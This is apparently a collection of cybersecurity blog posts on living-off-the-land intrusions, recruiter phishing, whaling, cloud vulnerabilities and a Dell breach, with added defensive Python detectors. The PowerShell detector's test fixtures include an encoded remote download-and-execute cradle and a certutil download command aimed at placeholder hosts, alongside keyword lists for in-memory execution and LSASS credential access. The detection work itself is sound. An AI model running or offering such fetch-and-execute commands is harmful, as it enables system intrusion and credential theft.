A large corporation with a well-funded cybersecurity team recently found out it had been hacked! Its opponents used a combination of Living off the Land (LotL) techniques, fileless malware, legitimate credentials, and disguised communication, and that combination makes this type of botnet activity incredibly difficult to detect, even for expert tiger teams. Without the right focus on behavioral analysis, memory forensics, and network monitoring, even highly skilled teams can miss the subtle signs of this advanced form of attack.

If your teams are looking for traditional malware or malicious executables, they may not have focused on monitoring the activities of legitimate tools. Attackers using these tools can camouflage their actions to blend in with normal system administration tasks, so even if your tiger teams were monitoring system processes, the malicious use of these tools could easily go unnoticed.

One of the core advantages of LotL is the use of fileless techniques, which means that the attackers often don’t drop detectable malware on the system’s disk. Instead, they execute code directly in memory or utilize scripting environments like PowerShell. This method leaves behind little to no trace that traditional malware-detection tools or endpoint security would recognize.

The teams may have been conducting disk-based or signature-based analysis, which is ineffective against fileless malware. Because the attackers leave no artifacts on the disk, they bypass traditional endpoint detection, which would have been a major focus of the teams.
Since most of the activity occurs in memory, uncovering these attacks requires deep memory forensics. If the tiger teams did not perform real-time memory analysis or use sophisticated memory forensics tools, they could miss the attack entirely.

Story By Skeeter Wesinger

September 19, 2024

U.S. authorities said on Wednesday that Flax Typhoon infiltrated networks by exploiting known vulnerabilities and then used existing system tools to steal data.
The bots bypassed traditional security solutions like antivirus and intrusion detection systems because those systems were designed to detect known “malware signatures” or unusual file activity.

The state-sponsored actor, in this case the PRC, therefore relied on the stealth of legitimate system tools and avoided dropping large or sophisticated malware packages, which would increase the likelihood of triggering these defenses. By minimizing the use of any detectable malware, the attackers avoided detection by standard signature-based systems. After gaining initial access, they dumped user credentials from memory or password stores, allowing them to elevate privileges and move laterally across the network, accessing more sensitive systems and data.
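The detection focus that both posts above call for, behavioral analysis of legitimate tools, in-memory PowerShell, and credential dumping from memory, can be written as plain rules over endpoint telemetry. The block below is an added example for this article, not code from the original posts. It runs over constructed Sysmon-style records; the record layout, the LSASS allowlist, the keyword list and the LOLBin argument patterns are assumptions to be tuned for a real fleet.

```python
"""Behavioral rules for living-off-the-land activity, run over constructed
Sysmon-style endpoint records (process creation, LSASS access, PowerShell
script blocks). Added example for this article, not from the original posts;
the record layout, the allowlist and the keyword lists are assumptions."""
import base64
import re

# Processes that legitimately open LSASS on many hosts (assumption; tune per fleet).
LSASS_SOURCE_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}

# Keywords typical of in-memory PowerShell execution (assumption, not exhaustive).
PS_SUSPICIOUS = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|downloadfile|frombase64string|reflection\.assembly)",
    re.IGNORECASE,
)

# Argument patterns for commonly abused built-in binaries (assumption, small subset).
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.IGNORECASE),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.IGNORECASE),
    "rundll32.exe": re.compile(r"javascript:|https?://", re.IGNORECASE),
}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def encode_ps(command):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Return (rule, detail) findings for one telemetry record."""
    findings = []
    kind = record.get("event")
    if kind == "process_create":
        image = basename(record["image"])
        cmdline = record.get("cmdline", "")
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                findings.append(("ps_encoded_command", decoded.strip()))
            text = cmdline + " " + (decoded or "")  # inspect the decoded payload too
            if re.search(r"-w(?:indowstyle)?\s+hidden", text, re.IGNORECASE):
                findings.append(("ps_hidden_window", cmdline))
            for hit in PS_SUSPICIOUS.findall(text):
                findings.append(("ps_suspicious_keyword", hit.lower()))
        pattern = LOLBIN_PATTERNS.get(image)
        if pattern and pattern.search(cmdline):
            findings.append(("lolbin_abuse", image + ": " + cmdline))
    elif kind == "process_access":
        source, target = basename(record["source_image"]), basename(record["target_image"])
        if target == "lsass.exe" and source not in LSASS_SOURCE_ALLOWLIST:
            findings.append(("lsass_access", source + " -> lsass.exe, access " + str(record.get("granted_access"))))
    elif kind == "script_block":
        for hit in PS_SUSPICIOUS.findall(record.get("script", "")):
            findings.append(("ps_suspicious_keyword", hit.lower()))
    return findings


# Constructed sample telemetry (not real logs); hosts use the reserved .invalid TLD.
SAMPLE_RECORDS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"event": "process_create", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/b.txt b.txt"},
    {"event": "process_access", "source_image": r"C:\Users\Public\tool.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event": "process_access", "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def scan(records):
    """Index of each record that produced findings, mapped to those findings."""
    report = {}
    for i, record in enumerate(records):
        findings = analyze(record)
        if findings:
            report[i] = findings
    return report


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_RECORDS).items():
        for rule, detail in findings:
            print(f"record {i}: {rule}: {detail}")
```

Running the script prints one line per finding. Decoding the -EncodedCommand argument is what makes the hidden download cradle visible in the first record, and the allowlist is what keeps the antivirus engine's legitimate LSASS access in the fourth record from firing; the plain backup script in the last record produces nothing.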

Story By Skeeter Wesinger

September 19, 2024

Phishing attacks on LinkedIn are becoming increasingly sophisticated. State-sponsored actors are posing as recruiters from major headhunting firms like Korn Ferry, based in Los Angeles. These attackers aim to trick professionals into revealing sensitive information or downloading malware by creating profiles that closely resemble those of legitimate recruiters.

The process begins with attackers setting up fake LinkedIn profiles using stolen or fabricated information. A key red flag is the number of LinkedIn connections; if the profile has fewer than 10, it’s often a fake. These profiles frequently use company logos, professional headshots, and detailed job descriptions to appear credible. They may claim to represent well-known firms or major corporations like Google, Microsoft, or top-tier recruitment agencies to target professionals who aspire to work at such companies.

Once the profile is in place, the phishing attempt usually starts with a connection request or a direct message (InMail). The message will likely include a job offer or a unique career opportunity crafted to appeal to the recipient. The attacker might claim they’ve reviewed your profile and believe you are an excellent candidate for a prestigious, high-paying job—tactics often enhanced using AI to generate convincing content.

In the message, the fake recruiter may include a link, supposedly leading to a job portal, a document with more details, or a form to submit your CV. However, these links usually redirect to a malicious site designed to steal login credentials and personal information or install malware. Always hover over any links to inspect them before clicking. If the link looks suspicious, reconsider engaging.

Some of the most sophisticated attackers even create fake LinkedIn login pages or corporate websites to capture your username and password. It’s critical never to reuse passwords, as this could expose you to further attacks down the line. Additionally, they might request personal information such as your phone number, home address, or social security number under the pretense of a job application.

Remember, these attackers are not amateurs—they are state-sponsored actors. Be vigilant and cautious when interacting with unsolicited job offers on LinkedIn. Always verify the legitimacy of any recruiter before providing any information, and stay aware of the signs that an offer may be too good to be true.
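The advice above to hover over a link and inspect it before clicking can be automated for a whole message. The following is an added example for this article, not the author's code: it pulls every link out of an HTML message, compares the text the link shows with where it really points, decodes punycode host names, and flags hosts that imitate or embed a trusted domain. The trusted-domain list, the confusable-character map and the sample message are assumptions constructed for the example.

```python
"""Link inspection for recruiter-style messages: compares the text a link
displays with where it really points, decodes punycode host names, and flags
lookalikes of domains the reader trusts. Added example for this article, not
the author's code; the trusted-domain list and the confusable map are assumptions."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the reader expects a recruiter link to use (assumption).
TRUSTED_DOMAINS = {"linkedin.com", "kornferry.com"}

# Characters commonly swapped for lookalikes (assumption; a tiny subset of Unicode confusables).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "\u0456": "i", "\u0131": "i"})


def registrable_domain(host):
    """Last two labels of a host name (crude; real code should use the Public Suffix List)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize_lookalike(domain):
    """Fold common substitutions so '1inkedin.com' compares equal to 'linkedin.com'."""
    return domain.lower().replace("rn", "m").replace("vv", "w").translate(CONFUSABLES)


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from an HTML message body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def inspect_link(href, text):
    """Return warning strings for one link; an empty list means nothing looked odd."""
    warnings = []
    parsed = urlparse(href if "://" in href else "http://" + href)
    raw_host = parsed.hostname or ""
    try:
        host = raw_host.encode("ascii").decode("idna")  # reveals xn-- (punycode) labels
    except UnicodeError:
        host = raw_host
    if host != raw_host:
        warnings.append(f"punycode host decodes to {host}")
    if parsed.scheme == "http":
        warnings.append("link is not HTTPS")
    domain = registrable_domain(host)
    shown = re.search(r"https?://([^/\s]+)", text)  # the text itself looks like a URL
    if shown and registrable_domain(shown.group(1)) != domain:
        warnings.append(f"text shows {shown.group(1)} but link goes to {host}")
    if domain not in TRUSTED_DOMAINS:
        if normalize_lookalike(domain) in TRUSTED_DOMAINS:
            warnings.append(f"{domain} looks like a trusted domain")
        for trusted in TRUSTED_DOMAINS:
            if trusted.split(".")[0] in host:
                warnings.append(f"{host} embeds trusted name {trusted} but is not {trusted}")
                break
    return warnings


def inspect_message(html):
    """Map each suspicious href in an HTML message to its warnings."""
    parser = LinkExtractor()
    parser.feed(html)
    report = {}
    for href, text in parser.links:
        warnings = inspect_link(href, text)
        if warnings:
            report[href] = warnings
    return report


# Constructed sample: a Cyrillic 'i' (U+0456) inside "linkedin", encoded as a real punycode label.
PUNYCODE_HOST = "l\u0456nkedin.com".encode("idna").decode("ascii")
SAMPLE_MESSAGE = (
    "<p>We reviewed your profile and think you are an excellent candidate.</p>"
    '<a href="http://linkedin.com-careers.example/apply">https://www.linkedin.com/jobs/view/12345</a> '
    f'<a href="https://{PUNYCODE_HOST}/login">Apply here</a> '
    '<a href="https://www.kornferry.com/careers">Korn Ferry careers</a>'
)

if __name__ == "__main__":
    for href, warnings in inspect_message(SAMPLE_MESSAGE).items():
        print(href)
        for w in warnings:
            print("  -", w)
```

The first sample link fails three checks at once (plain HTTP, visible text that names a different site, and a trusted brand name stuffed into a stranger's domain); the second is caught only because the punycode label is decoded before comparison; the genuine Korn Ferry link produces no warnings.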


Article by Skeeter Wesinger

September 16, 2024

https://www.linkedin.com/pulse/phishing-attacks-linkedin-skeeter-wesinger-5newe

Of course, I am not using their real name, but the (Blue) Whale, also known as the Whale Group, is considered dangerous for several reasons, primarily its sophisticated methods, its specific targets, and its alignment with geopolitical interests.
The Blue Whale is known for using highly targeted and convincing phishing campaigns. These attacks often involve well-researched and personalized emails that trick recipients into revealing sensitive information, such as login credentials. The group’s ability to craft sophisticated spear-phishing emails that appear legitimate makes detecting the threat challenging for even vigilant individuals.

The Blue Whale primarily focuses on high-profile targets, including political figures, military personnel, journalists, and researchers, particularly in Europe and Eastern Europe. These targets often work in sensitive areas like national security, policy-making, or international relations. The information stolen from such targets can be extremely valuable and could potentially be used to influence political events or even compromise national security.
The group’s primary motive appears to be espionage and intelligence gathering, which aligns with the interests of state-sponsored cyber espionage. The information collected by the Blue Whale could be used for a variety of purposes, including, but not limited to, undermining political opponents, influencing elections, or gaining a strategic advantage in international negotiations.
The Blue Whale has demonstrated high-level persistence in its operations. Often, the group returns to its targets repeatedly using remote connections until it is finally successful. The group is also extremely adaptive, constantly refining its tactics, techniques, and procedures (TTPs) to evade detection and improve the effectiveness of its attacks. This persistence and adaptability make it a formidable adversary and one not to be taken lightly.
In addition to phishing, the Blue Whale has been known to use advanced techniques, such as zero-day exploits (vulnerabilities that are currently unknown to the software vendor), to compromise systems. This level of sophistication indicates that the group has access to significant resources, potentially directly supplied by a nation-state sponsor.
Beyond espionage, the activities of groups like the Blue Whale have the potential to cause significant disruption. By compromising key individuals and institutions, they can disrupt governmental operations, undermine public trust, and create instability. In some cases, the stolen information could be leaked or manipulated to create political unrest or even to discredit public figures.
Overall, the (Blue) Whale’s combination of targeted attacks, sophisticated methods, and alignment with geopolitical interests makes it one of the world’s most dangerous cyber-espionage groups. Its activities have the potential to cause significant harm at both the individual and state levels, making it a critical concern for cybersecurity professionals and national security agencies.

By Skeeter Wesinger August 18, 2024

Whaling is a specialized form of spear phishing that targets high-profile individuals within an organization, often called the “very big fish.” These targets typically include senior executives, CEOs, CFOs, board members, or other key personnel with significant access to sensitive information, decision-making power, or financial resources. The term “whaling” is derived from the idea that these individuals are the “big fish” in the organizational hierarchy, making them particularly valuable targets for attackers.

Whaling

Attackers carefully select their targets based on their roles and access within the organization. High-ranking executives are prime targets because they often have the authority to approve financial transactions, access confidential information, or initiate critical decisions without additional oversight.

Research and Reconnaissance:

Before launching an attack, cybercriminals conduct extensive research on their targets. They gather information from publicly available sources like LinkedIn, company websites, press releases, social media, and news articles. This information is used to craft personalized and convincing emails or messages that resonate with the target’s professional responsibilities and personal interests.

A whaling attack’s phishing email is highly customized and tailored to the specific target. It might appear to come from a trusted source, such as a colleague, a business partner, or even the company CEO, and these emails look real. The email often contains urgent requests, such as approving a financial transaction, and often includes a clickable link for downloading an attachment or providing sensitive information.

An email that resembles spear phishing but entices the recipient to call a phone number instead of clicking a link is called vishing (short for “voice phishing”).

In a vishing attack, the email may be crafted to appear as a legitimate communication from a trusted source, often urging the recipient to call a specific phone number. Once the recipient calls, they are typically connected to a scammer who attempts to extract sensitive information, such as passwords, credit card numbers, or other personal data, often under the guise of resolving an urgent issue or verifying account details.

Unlike generic phishing attacks, which might contain obvious red flags like poor grammar or suspicious links, whaling emails are usually very well-crafted, making them difficult to detect as fraudulent.

Once the target falls for the phishing attempt, the attacker can exploit the situation in various ways:

  • The attacker might trick the executive into authorizing a wire transfer to a fraudulent account.
  • The attacker could gain access to sensitive information, such as intellectual property, confidential business plans, or employee records.
  • The attacker may obtain login credentials that provide access to the company’s network, enabling further infiltration and data breaches.

The consequences of a successful whaling attack can be severe, including financial losses, legal repercussions, reputational damage, and the compromise of sensitive data. Because these attacks target the highest levels of an organization, they can have a cascading effect, leading to widespread disruption.

Whaling by Foreign Actors:

When whaling attacks are conducted by foreign actors, such as nation-state groups or state-sponsored hackers, the stakes are even higher. These attacks may be part of broader cyber-espionage campaigns aimed at stealing trade secrets, gaining intelligence, or disrupting the operations of a foreign company or government.

In this context, the term “whaling” still applies, but the focus shifts to the strategic objectives of the attackers, who may be working on behalf of a foreign government with geopolitical motives. These attacks are often more sophisticated, involving advanced techniques like social engineering, custom malware, and exploitation of zero-day vulnerabilities.

Security Awareness Training: Educating executives and key personnel about the risks of whaling and how to recognize phishing attempts is critical. Regular training sessions can help them spot suspicious emails and avoid falling victim.

Multi-Factor Authentication (MFA): Implementing MFA for accessing sensitive systems and approving financial transactions adds an extra layer of security, making it harder for attackers to exploit compromised credentials.

Email Filtering and Security Solutions: Advanced email security solutions can help detect and block phishing attempts by analyzing email content, links, and attachments for signs of fraud.

Incident Response Planning: Organizations should have a robust incident response plan to quickly respond to and mitigate the effects of a whaling attack, should one occur.
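The email filtering mitigation above can be made concrete with a few header and content heuristics aimed at exactly the whaling pattern described in this post: an executive's name on an outside mailbox, replies diverted elsewhere, urgency paired with a request to move money, and a failed sender check at the gateway. The block below is an added example for this article, not the author's code; the internal domain, the executive list, the keyword lists, the verdict thresholds and the two sample messages are assumptions constructed for the example.

```python
"""Heuristic triage of executive-impersonation ("whaling") mail, run over two
constructed messages. Added example for this article, not the author's code;
the internal domain, executive list and keyword lists are assumptions."""
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "example-corp.test"                 # assumption
EXECUTIVES = {"pat jones": "CEO", "sam lee": "CFO"}   # assumption: display names worth protecting
URGENCY_WORDS = ("urgent", "immediately", "today", "confidential", "asap")
MONEY_WORDS = ("wire", "transfer", "invoice", "payment", "gift card", "bank")


def plain_text(msg):
    """Concatenate the text/plain parts of a message (multipart or not)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def score_message(raw):
    """Return (rule, detail) findings for one RFC 822 message string."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    from_domain = addr.rsplit("@", 1)[-1].lower()
    findings = []

    # 1. An executive's display name on a mailbox outside the company.
    if name.strip().lower() in EXECUTIVES and from_domain != INTERNAL_DOMAIN:
        findings.append(("exec_name_external_sender", f"{name} <{addr}>"))

    # 2. Replies silently diverted to a different mailbox.
    if reply_to and reply_to.lower() != addr.lower():
        findings.append(("reply_to_mismatch", reply_to))

    # 3. Urgency combined with a request that moves money.
    text = (msg.get("Subject", "") + "\n" + plain_text(msg)).lower()
    urgency = [w for w in URGENCY_WORDS if w in text]
    money = [w for w in MONEY_WORDS if w in text]
    if urgency and money:
        findings.append(("urgent_financial_request", f"{urgency} + {money}"))

    # 4. The receiving gateway recorded an SPF or DMARC failure.
    auth = msg.get("Authentication-Results", "").lower()
    if "spf=fail" in auth or "dmarc=fail" in auth:
        findings.append(("auth_failed", auth))
    return findings


def verdict(findings):
    """Route a message by how many independent signals fired (thresholds are assumptions)."""
    if len(findings) >= 3:
        return "quarantine"
    if findings:
        return "flag_for_review"
    return "deliver"


# Constructed samples (not real mail); domains use the reserved .test TLD.
SUSPICIOUS = """\
From: Pat Jones <pat.jones@mail-example.test>
To: finance@example-corp.test
Reply-To: pj-private@mail-example.test
Subject: Urgent: wire before the board meeting
Authentication-Results: mx.example-corp.test; spf=fail; dmarc=fail
Content-Type: text/plain; charset="utf-8"

Please process a wire transfer today for a confidential acquisition.
Call me only after it is done.
"""

BENIGN = """\
From: Pat Jones <pat.jones@example-corp.test>
To: finance@example-corp.test
Subject: Q3 planning deck
Authentication-Results: mx.example-corp.test; spf=pass; dkim=pass; dmarc=pass
Content-Type: text/plain; charset="utf-8"

Attached is the planning deck for next week. No action needed.
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        findings = score_message(raw)
        print(label, "->", verdict(findings), findings)
```

No single signal is decisive on its own, which is why the verdict counts independent findings rather than keyword hits: a genuine executive does sometimes send an urgent note about a payment, but not from an outside domain with a diverted Reply-To and a failed DMARC check.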

By Skeeter Wesinger August 14, 2024

 

Researchers at Wiz have uncovered several critical vulnerabilities across various cloud platforms, highlighting some significant security risks:

ExtraReplica: This vulnerability in Azure PostgreSQL allowed cross-account database access. By exploiting a misconfigured regular expression in the database’s SSL certificate validation, attackers could forge certificates to impersonate replication users and gain unauthorized access to databases.
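The bug class behind ExtraReplica, as described above, is a certificate identity check written as a loosely specified regular expression. The block below is an added example for this article, not Azure's code or Wiz's research material: the naming scheme, both regexes, the region list and the sample common names are constructed assumptions. It shows the two classic mistakes, unescaped dots and a pattern anchored only at the start, beside a hardened check, and beside the simplest correct form, an exact comparison against the one identity the connection expects.

```python
"""The bug class behind ExtraReplica as described above: a certificate identity
check written as a loose regular expression. The naming scheme, both regexes and
the region list are constructed for this article (assumptions), not Azure's code."""
import re

# Assumed scheme: replication certificates carry CN "replication.<region>.db.example.test".
KNOWN_REGIONS = {"eastus", "westeurope"}

# Weak check: unescaped dots match any character, and re.match() only anchors the start,
# so the pattern also accepts names an outsider could obtain a certificate for.
WEAK_RE = re.compile(r"replication.[a-z0-9-]+.db.example.test")

# Hardened check: escaped dots, fullmatch() anchors both ends, and the region captured
# from the name must be the one this connection expects.
STRICT_RE = re.compile(r"replication\.([a-z0-9-]+)\.db\.example\.test")


def weak_is_replication_cert(cn):
    """The flawed validation."""
    return WEAK_RE.match(cn) is not None


def strict_is_replication_cert(cn, expected_region):
    """Pattern-based validation done carefully."""
    m = STRICT_RE.fullmatch(cn)
    return (m is not None and expected_region in KNOWN_REGIONS
            and m.group(1) == expected_region)


def exact_is_replication_cert(cn, expected_region):
    """Simplest correct form: compare against the one identity you expect, no pattern at all."""
    return expected_region in KNOWN_REGIONS and cn == f"replication.{expected_region}.db.example.test"


# Constructed common names: one genuine, three that only the weak check accepts.
SAMPLE_CNS = [
    "replication.eastus.db.example.test",                       # genuine
    "replication.eastus.db.example.test.attacker-owned.test",   # trailing labels ignored by match()
    "replication-eastus-db-example.test",                       # unescaped dots also match '-'
    "replication.westeurope.db.example.test",                   # real name, wrong region for this connection
]


def compare(cns, expected_region="eastus"):
    """Per CN: (weak verdict, strict verdict) for a connection expecting expected_region."""
    return {cn: (weak_is_replication_cert(cn), strict_is_replication_cert(cn, expected_region))
            for cn in cns}


if __name__ == "__main__":
    for cn, (weak, strict) in compare(SAMPLE_CNS).items():
        print(f"{cn:60} weak={weak!s:5} strict={strict}")
```

The second and third names are ones an outsider could legitimately hold a certificate for, since they sit under a domain the outsider controls, yet the weak pattern treats them as replication identities. The hardened form rejects them, and the exact comparison avoids the whole class of regex mistakes by never treating identity as a pattern.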

AttachMe: Found in Oracle Cloud Infrastructure, this vulnerability enabled unauthorized users to attach storage volumes to their instances, providing them with full read/write access. Attackers could exploit this by knowing the volume’s OCID and ensuring their instance was in the same availability domain as the target volume.

NotLegit: This issue in Azure App Service exposed hundreds of source code repositories due to a configuration flaw. The vulnerability allowed public access to applications’ .git directories, leading to potential leaks of sensitive information and intellectual property.

ChaosDB: A significant flaw in Azure Cosmos DB, where integration with Jupyter Notebooks inadvertently exposed database keys. This allowed potential attackers to take over entire databases remotely.

SAPwned: Multiple vulnerabilities in SAP AI Core services, such as unauthenticated access to Helm servers and AWS tokens exposed by Grafana Loki, allowed attackers to access and manipulate customer data, posing risks of data breaches and supply chain attacks.

By Skeeter Wesinger July 23, 2024

Any client agent, including the CrowdStrike Falcon Sensor, could pose a security risk if not properly managed and secured.
Like any software, the Falcon Sensor could contain vulnerabilities that, if discovered and exploited by malicious actors, could compromise one or more endpoints. Regular updates and patches are essential to mitigate the risk of software vulnerabilities.
An improper agent configuration could leave the system exposed to threats. For example, if the sensor is not configured to monitor specific activities or enforce certain policies, it may fail to detect or prevent attacks.

Attackers who gain administrative access to the Falcon Sensor’s management console could turn off the sensor, alter its configurations, or manipulate its data. To prevent this insider threat, strict access controls and monitoring of administrative activities are critical.
The Falcon Sensor requires certain privileges to perform its monitoring and protective functions. If an attacker misuses or escalates these privileges, it could lead to a broader system compromise through privilege escalation.
The sensor collects extensive data about endpoint activities. If this data is not adequately protected, it could be accessed by unauthorized parties, leading to potential data breaches and privacy violations, because whoever controls the endpoint can see that data.
If the sensor produces false positives, legitimate activities might be blocked, disrupting business operations. Conversely, false negatives could allow threats to go undetected, compromising the endpoint.
The Falcon Sensor integrates with various other security systems and platforms. Weaknesses in these integrations, such as insecure APIs or communication channels, could be exploited to bypass the sensor’s protections.
The Falcon Sensor communicates with the CrowdStrike Falcon platform over the network. If these communications are not encrypted or adequately secured, attackers could intercept or tamper with them, creating exposure.
If the CrowdStrike software supply chain is compromised, attackers could introduce malicious code into the sensor before installing it on the endpoint. Ensuring the integrity and authenticity of software updates is vital to prevent this kind of attack.
By understanding and addressing these risks, organizations can significantly reduce the likelihood that the CrowdStrike Falcon Sensor itself becomes a security vulnerability.

Dell Data Breach: A Modern Corporate Catastrophe

Dell Technologies, a titan in computing, recently found itself embroiled in a calamitous event: a massive data breach that affected approximately 49 million customers. The exposed information includes personal details such as names, addresses, and purchase histories.
Dell’s Initial Response: A HotWash
In a statement cloaked in corporate calmness, Dell Technologies asserted its commitment to the privacy and confidentiality of customer data. The company revealed an ongoing investigation into an incident involving a Dell portal, which harbored a database with certain types of customer information related to purchases. Dell downplayed the potential risk, emphasizing that the compromised data did not encompass financial or payment information, email addresses, telephone numbers, or any highly sensitive customer details.
The accessed data, according to Dell, was limited to:
  • Name
  • Physical address
  • Dell hardware and order information, including service tags, item descriptions, dates of orders, and related warranty information
A Divergent Narrative: The Hacker’s Claim
Contrasting Dell’s measured disclosures, a post on a hacker forum, as reported by the Daily Dark Web, painted a more sinister picture. The threat actor behind the post claimed to be selling data allegedly stolen from Dell’s systems in late April. The illicit advertisement boasted of “49 million customer records from Dell,” purportedly containing details of purchases made between 2017 and 2024.
Such a trove of information undeniably heightens the risk of targeted phishing attacks. Imposters, masquerading as Dell representatives, could exploit this data to deceive users into clicking malicious links, potentially leading to credential theft.
Dell’s Reassurances and Customer Guidance
Despite the grim scenario depicted by the hacker, Dell reassured its customers that no financial or payment information was included in the compromised database. The absence of email addresses and telephone numbers was also emphasized as a mitigating factor.
Dell advised its customers to remain vigilant and to report any suspicious activity related to their Dell accounts or purchases to their security team via email.
Conclusion: A Lingering Cloud of Uncertainty
The Dell data breach underscores the persistent vulnerabilities in the digital age, where even the most formidable corporations are not immune to cyber threats. While Dell’s reassurances may temper immediate fears, the long-term implications for customer trust and corporate reputation remain shrouded in uncertainty. As the investigation unfolds, Dell’s response and mitigation efforts will undoubtedly be scrutinized, serving as a cautionary tale in the annals of modern corporate history.

There is a known scam involving Microsoft Edge where users are tricked into believing they’ve been hacked. This scam often uses malicious pop-ups or notifications claiming that your computer is compromised, urging you to take immediate action. These alerts appear legitimate, but they are designed to deceive and potentially lead you to harmful sites or extract money from you. Clear your browser’s cache and cookies and run a full system scan with your antivirus software to address this. Avoid clicking on any suspicious links or calling any provided phone numbers.


The cure is in your settings, which are found under More Tools. Open Settings, and in the drop-down on the left side of the screen you will find Cookies and site permissions. Under Recent activity, instead of deleting all of your cookies, open the offending cookie and choose Block everything. If this needs to be clarified, call a good service person.

Free Email Services

Examples: Gmail, Yahoo Mail, Outlook.com

Advantages:

  1. Cost: They are free to use, which is the most significant advantage for many users.
  2. Accessibility: Easy to set up and use, often requiring just a few minutes to create an account.
  3. Basic Features: Offer essential email features, including sending and receiving emails, attachments, spam filtering, and security.
  4. Integration: Often integrates with other free services offered by the provider, such as cloud storage, calendars, and online document editing.

Disadvantages:

  1. Privacy Concerns: Free email providers use data mining to serve targeted advertisements. Your email content and personal data may be analyzed.
  2. Advertisements: Many free email services display ads within the email interface.
  3. Limited Support: Customer support is often limited and typically available through forums or help centers rather than direct contact.
  4. Storage Limits: Free accounts may come with limited storage space, requiring users to manage and delete emails regularly.
  5. Custom Domain: Free email services usually don’t allow using a custom domain (e.g., yourname@yourdomain.com), which can be less professional for business use.

Paid Email Services

Examples: Google Workspace (formerly G Suite), Microsoft 365, ProtonMail (paid tier), Zoho Mail

Advantages:

  1. Privacy and Security: Paid services often prioritize user privacy, providing better security measures and no ads. Some services offer end-to-end encryption.
  2. Custom Domain: Allows for custom domain email addresses, which are essential for businesses and professional use.
  3. Advanced Features: These include additional features like more storage space, advanced spam filtering, email aliases, and enhanced collaboration tools.
  4. Customer Support: Access to dedicated customer support, often including phone and email support.
  5. Integration: Seamless integration with other premium services and software offered by the provider, such as advanced cloud storage, team collaboration tools, and enterprise-grade applications.

Disadvantages:

  1. Cost: Requires a monthly or annual subscription fee, which can vary based on the service level and number of users.
  2. Setup Complexity: This may require a more complex setup, especially for custom domain email addresses requiring technical knowledge or professional assistance.
  3. Overhead: Businesses must manage the subscriptions and renewals, adding to administrative overhead.

Security Drawbacks of Free Services like Google (Gmail)

  1. Data Mining and Privacy:
    • Email Scanning: Google scans emails for targeted advertising and data analytics. While this is primarily for ad targeting, it raises data privacy and security concerns.
    • Third-Party Access: Although Google has robust security measures, there have been concerns about third-party apps and services accessing user data through permissions granted by the user.
  2. Advertising Model:
    • Targeted Ads: The presence of targeted ads based on email content can feel invasive and raise concerns about how securely data is being handled.
  3. Basic Security Features:
    • Encryption: Gmail offers encryption in transit (TLS), but emails are not end-to-end encrypted by default. This means Google can access email content.
    • Standard Protection: While Gmail includes standard security measures like spam filtering and phishing protection, more might be needed for businesses with high-security needs.
  4. Support and Incident Response:
    • Limited Direct Support: Free services offer limited direct support in the case of a security breach or urgent security issue. Users might have to rely on forums and help centers, which can delay resolution.
    • Response Time: Security incidents might not be addressed as promptly as with paid services that offer dedicated support.

Security Advantages of Paid Services like Network Solutions

  1. Enhanced Privacy:
    • No Data Mining for Ads: Paid services like Network Solutions do not rely on advertising revenue, so they don’t scan emails for ad targeting. This ensures greater privacy and security for your data.
    • Data Ownership: Users typically retain full ownership and control of their data, which is not used for any purpose other than providing the service.
  2. Advanced Security Features:
    • End-to-end Encryption: Many paid email services offer end-to-end encryption, ensuring that only the sender and recipient can read the email content.
    • Advanced Spam and Phishing Protection: Enhanced spam filters, phishing protection, and malware detection are standard in paid services, reducing the risk of security breaches.
  3. Custom Security Configurations:
    • Customizable Security Settings: Paid services allow for more granular control over security settings, enabling businesses to tailor security protocols to their specific needs.
